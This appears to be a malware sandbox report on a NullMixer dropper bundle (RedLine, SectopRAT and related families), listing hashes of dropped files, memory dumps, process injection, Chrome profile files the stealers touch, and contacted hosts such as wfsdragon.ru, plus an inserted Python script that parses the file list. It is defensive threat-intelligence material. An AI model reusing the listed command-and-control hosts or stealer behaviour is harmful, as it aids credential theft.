| MD5 | 32ec5a7f8e578bbb6142b3c7972b5e3e |
| SHA1 | dc335867f93b0e9e2f1d20ce520bb143789d733c |
| SHA256 | 7d828c11e69048323472ea71f6fd00bc26d6453ecb5f8972cf584d42a5748ec7 |
| SHA512 | 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff |
C:\Users\Admin\AppData\Local\Temp\F3U_R.J
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\TfSay.w
| MD5 | 8649bd267357309e3ceaf325ef72ee1e |
| SHA1 | 7ea28d42e186163a536cdd276aafac6bf1ec9a2e |
| SHA256 | 98b9eb7f7bdab1e321d89320bbf37c6dd2f27a133c6886931a05dde265fbdfe1 |
| SHA512 | 4bf603a2a08e241041910b6e812f3786f8ee5abeb4932f06aee7cf67ad39dba02937bb4b34a8d886ac6c98d419445ed06dd6c0df4dd6393f5ec0c70a30d3747b |
C:\Users\Admin\AppData\Local\Temp\aobbVRP.2Y
| MD5 | adadb251d9dea14b1e40088e413cac09 |
| SHA1 | 463c21b87129219dd19527988bb32187d2d9fe63 |
| SHA256 | 1241b5729731da59ddac03300feccd6b36d4c8980e8d0f8557149e62cce94c82 |
| SHA512 | d1a2d59a93388cff4d867fcbdcabf141bdf311d9b4214731def39b379efb1711d496742771685ad617ff0f438c7591d1a815cbae4d55ea8be986a34944764f80 |
C:\Users\Admin\AppData\Local\Temp\y5ULsw.L6
| MD5 | e52e44f4497cd6774193799b4e11da75 |
| SHA1 | 311b0e241233b161a9ce32eaac884dfa3c89e1ee |
| SHA256 | 59240a41f7dfabcb70c4bbf7bf3281f35a597fd40ce5069543e656244331d3bf |
| SHA512 | 096c5b765ba029bf752c3ca9afda7b93cc318baea3a00980e2d40379c1aaa13ea87fe2bfc91e52d2f40c1c960162cbd8b8b9a845960341ed63195035563c0a6e |
memory/2748-277-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/1572-278-0x0000000000400000-0x0000000002F22000-memory.dmp
memory/4564-279-0x0000000002E60000-0x0000000002F05000-memory.dmp
memory/4564-280-0x0000000002F10000-0x0000000002FA2000-memory.dmp
memory/4564-283-0x0000000002F10000-0x0000000002FA2000-memory.dmp
memory/2232-293-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4780-294-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4564-317-0x0000000000400000-0x00000000005F0000-memory.dmp
memory/1572-316-0x0000000000400000-0x0000000002F22000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 27c4f20d38a83568b9e13a2574fccc0c |
| SHA1 | 029b28e99d6376f10831ed8cc0f1abf290cf347e |
| SHA256 | caf821189772f88137d636ece6fafeb7749ad6a54ed71a21279716673d8bba72 |
| SHA512 | fbdfa543ed88252d1c0d8e4584297e0a2ef5991d881a5b361de9058fc6021c569afc0ee6857753a70e4e069f054afb4288fdbdf2169e363669dc361d1187f939 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f6258be639e7e2b77cbabeea238025e3 |
| SHA1 | e9a97f9ce2e036f605305a429d04db321f52c763 |
| SHA256 | 0482c64dba8267176642e7f2bfe0f38dd9a359e20b0ba967f99c5a120eba9d8c |
| SHA512 | 99af28697b71dce58ef7bd208c249f9a8e9ccca0b9173b56d7f8ef305d9b072d07264270c30d2a679b7db5beb8f54198bf7106f5d68861e1748acfa027daae9b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d34f3d58-bc95-4333-8fb5-d410095e69ba.tmp
| MD5 | b284ff62d029ff02acac34c6c25bd475 |
| SHA1 | 967b47b71c93c903de467d0b35d6c0e30e7fc0cb |
| SHA256 | 41b6e4e9479cfebba78cc7814cc45895873025cc585a46085620b5a7e5e7ccf1 |
| SHA512 | 1cf65418e6498fc095fcc1840e68e8a9ce82a9f0e79db25aba879af7471940a4d1a5824d3a1668d8e1c1a1a69b193221aab97812bf0d0a0a659848cbd72350dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fb797fe07cbe3ef9eb41bd96da07bdf4 |
| SHA1 | 8441bcee5386bed896628c63ed3209f2d182c55d |
| SHA256 | 7388518c6a16e8fd79767028e554aed477ba2b25d8962df213833e8542f8e681 |
| SHA512 | 41a787886548c2b74a4f8e5aca9240adf3468c4040a7de15c4049d1502a9004085cb8cfb2e8e94f482e027ed8e90e6f5889304767a64b4f087e3a7ce24abc1e7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | aa444631d148f8348ea410b48f62efbe |
| SHA1 | 980c22f53c41db88a6ce0cd77419d11636c658c7 |
| SHA256 | b874d4fa7ab4a89b2ede949373d68236db2f596d308cb83fb24e4dc5eee1fa5c |
| SHA512 | c5dd1d99148c8f47427398c67cd728b1d500da25739ee92d0d9f7ba86189f5a7089803bfc3ccc636c4c01728f21e7a5f601f3748769ec9457515963afa72839e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | efff85065215929cddcd8e16125892af |
| SHA1 | 316542a2e6ee41df36d25cbdb13ac52c4ccf55f1 |
| SHA256 | df13545e75faeda5097aed7a4eab6134a640125737df77fbf9ce2a511501d125 |
| SHA512 | a2acc5ad351c33462467ba630743281aefeb06bb1ad575d425412fc617adad4882688b6e55e14f4258cf0bf6cc7a8b898eae19616fd0aa9b73657c693691408b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | f691321c4dc929a848080bd30981fcfd |
| SHA1 | 2b391b422d8d94bfccb3e7df60d67b6b2fdbe34e |
| SHA256 | 79c0554b04415c56f5f83b7c45cc866199c904c17368a2a6edc4cbd62dfebbcc |
| SHA512 | ee1e9c1118d1998c35b78fcd008d34eee15589bab76d72dab7c8d083660c7c5e3920fd3db8ad7fe3161a9210a377bd4ca9861dfce99073eccc787fb3617094c6 |
memory/4564-400-0x0000000002F10000-0x0000000002FA2000-memory.dmp
memory/4564-401-0x0000000002FB0000-0x0000000003BAB000-memory.dmp
memory/4564-402-0x0000000003BB0000-0x0000000003C3B000-memory.dmp
memory/4564-404-0x0000000003C40000-0x0000000003CC7000-memory.dmp
memory/4564-407-0x0000000003C40000-0x0000000003CC7000-memory.dmp
memory/4564-408-0x00000000007F0000-0x00000000007F1000-memory.dmp
memory/4564-409-0x0000000000800000-0x0000000000804000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 00f3396702aebf0bd5e0f444957e2112 |
| SHA1 | c63033b74c8daec7ee3aa5a875a5e01118d9c5bd |
| SHA256 | 4321758abfcd60cd4279925e2d0ee7459d8d6e2a583cf01ddbb85d4112981169 |
| SHA512 | 9cb6f450af40b8196fb627fd4b150ac185cc646d4060eba0151b2735c6983151046514fd45b1da5d55dde3e04ec180ce72af2d2499693005572f7a704928a170 |
C:\Users\Admin\AppData\Local\Temp\93c131d9-dafb-484a-91d9-824bc130b6e8.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1f4cfe70eba098ed27ec836eaf980dd8 |
| SHA1 | 61c569997488d0439dbc4b99322cda411e539f82 |
| SHA256 | 497384cae16ea4ef7cfd12335c2db7d08e21b706da1b66af9e6dd8684b167a3d |
| SHA512 | 6c1cd138b20d6e1517bc4546b318389f901e73e2160255d177f6c469e4e746a6b9230d7414fa6528bfe23a57cb22eab40abbb25335002bbd71d69e93716bc958 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | 29e371398d3d4614a0c11030dfffd84f |
| SHA1 | 7176b3a0c8cb913131b59f6f58ad9803e2128c80 |
| SHA256 | ab198411eeb0772bcbb22e5ce2eb95308e8cf549704ed16a276a1696f9ea85d0 |
| SHA512 | 2be829b75cf1840d6619d3f04369827e0293d292dfdde85be67a75f19677105067af06889c738308d002d230dcbf4dfc4ac4193c0bcabaa573ffdf4a7f6b121b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | ed173bb2a3bef744dadfa6727b0532b1 |
| SHA1 | 50ac6aa948d892ea2eb219584e48e229d6d85e8d |
| SHA256 | 6d47288a679f6ee0d75e9b651571bff8ef29b5d46b5db2b5ee9310ed78720cb5 |
| SHA512 | ac54947b062c4e0b3c4f11bc347047f61a181c0367849b85b815704dc4611b9c6279b95efb327a6c645ef705790abf1c247b7eb711509449fd8bc9e72f6067cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e1bcb1600f79143ab61232e96f864ed6 |
| SHA1 | 090a3864e404a03fe2476d8161db764d25fdfcf0 |
| SHA256 | f4a3c10a18ead1e0bc9278e563bf33f9f0c4380786ffdf94b809e763469ba5a4 |
| SHA512 | a994a063e95d68fabe693851cbaf6140fbe79a2c6dcb4cf00a3f14e962e056792fcbf32245d0996c4c3f153af585d8d714c17f8b0d54e9c046d97db006df9591 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 749244478c54fa257976848ca9859b75 |
| SHA1 | ab733fc2587399cac24f8c844921cd24b277f189 |
| SHA256 | 7cae9188be82ec7eb718a39d8d730f51ba008a4eec05f1c9ebc50a706e89b72f |
| SHA512 | c41887a854361904d470bb6cc156499f885a50643eaea05428c70c30f4b352c15777c5f5a7a4021e99dffdb4f390495de9f14ed4be98be52eb4ff3d48cb927bd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c13c59d5cbf904ac73ded00c53f5975e |
| SHA1 | 51f4cf160a52d217790cadf82443ad525e9ca853 |
| SHA256 | 39b413217055a01c375f7f0683593d76731bad28b98c760c541338b67c3f18d9 |
| SHA512 | d512ee71e3993d29493da10c1687e83ab8cdcc5fe3384131880c32619988fc9e2e63e1c95982ecb11292f4a04a3636f4bbd1e45f051f8bf1176464de96a8b1b1 |
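The Files section above lists each dropped or modified file as a path followed by a hash table, with memory-dump entries interleaved, and several browser-profile paths (Preferences, Local State) appear more than once with different hashes. The Python script below is added here as a worked example; it is not part of the report or of the sandbox tooling. It parses that layout into records, labels each file by where it landed, reports paths that were rewritten during the run (same path, more than one SHA256) and decodes the memory-dump names into process id, address range and size. SAMPLE_FILES is a constructed excerpt of the entries above; the location labels in classify() rely on naming conventions (the 7zS* unpack directory, the Inno Setup is-*.tmp directory) and are assumptions of this example, not statements from the report.

```python
"""Group a sandbox report's Files section by path and flag rewrites.
Added example, not part of the report. SAMPLE_FILES is a constructed
excerpt; the labels in classify() are naming-convention assumptions."""
import re
from collections import defaultdict

SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurl.dll
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
memory/4712-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcwwkdu1.p22.ps1
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
memory/1764-91-0x0000000002430000-0x0000000002466000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| SHA256 | 0482c64dba8267176642e7f2bfe0f38dd9a359e20b0ba967f99c5a120eba9d8c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| SHA256 | b874d4fa7ab4a89b2ede949373d68236db2f596d308cb83fb24e4dc5eee1fa5c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| SHA256 | caf821189772f88137d636ece6fafeb7749ad6a54ed71a21279716673d8bba72 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEMDUMP = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def classify(path):
    """Label a file by where it landed. The directory conventions are assumptions."""
    p = path.lower()
    if "\\google\\chrome\\user data\\" in p:
        return "browser-profile"      # read by the stealer or rewritten by the browser
    if "\\clr_v4.0" in p and p.endswith(".log"):
        return "clr-usage-log"        # side effect of a .NET process starting
    if p.endswith(".ps1"):
        return "powershell-script"
    if re.search(r"\\temp\\7zs[0-9a-f]+\\", p):
        return "sfx-staging"          # 7zS* prefix: 7-Zip SFX unpack directory (assumed)
    if re.search(r"\\temp\\is-[0-9a-z]+\.tmp\\", p):
        return "inno-setup-temp"      # is-XXXXX.tmp: Inno Setup temp directory (assumed)
    return "other"


def parse_files(text):
    """Return (files, memdumps): files are {path, kind, hashes},
    memdumps are {pid, index, start, end, size} decoded from the dump name."""
    files, memdumps = [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is not None:
                current["hashes"][m.group(1)] = m.group(2).lower()
            continue
        m = MEMDUMP.match(line)
        if m:
            start, end = int(m.group(3), 16), int(m.group(4), 16)
            memdumps.append({"pid": int(m.group(1)), "index": int(m.group(2)),
                             "start": start, "end": end, "size": end - start})
            current = None
            continue
        if line.startswith("|"):
            continue                  # some other table row, not a hash
        current = {"path": line, "kind": classify(line), "hashes": {}}
        files.append(current)
    return files, memdumps


def rewritten_paths(files):
    """Paths listed more than once with differing SHA256: rewritten during the run."""
    seen = defaultdict(list)
    for f in files:
        sha = f["hashes"].get("SHA256")
        if sha and sha not in seen[f["path"]]:
            seen[f["path"]].append(sha)
    return {p: h for p, h in seen.items() if len(h) > 1}


def count_by_kind(files):
    counts = defaultdict(int)
    for f in files:
        counts[f["kind"]] += 1
    return dict(counts)


def dumps_by_pid(memdumps):
    out = defaultdict(list)
    for d in memdumps:
        out[d["pid"]].append(d)
    return dict(out)


if __name__ == "__main__":
    files, dumps = parse_files(SAMPLE_FILES)
    print(count_by_kind(files), rewritten_paths(files), sorted(dumps_by_pid(dumps)))
```

Separating the staging-directory executables from the browser-profile files matters for triage: the former are the artifacts to hash and hunt for, while the repeated rewrites of Preferences and Local State are mostly the browser reacting to being launched, not something to block on.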
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe
"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1424 set thread context of 1528 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe |
| PID 2256 set thread context of 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe |
| PID 1784 set thread context of 2860 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
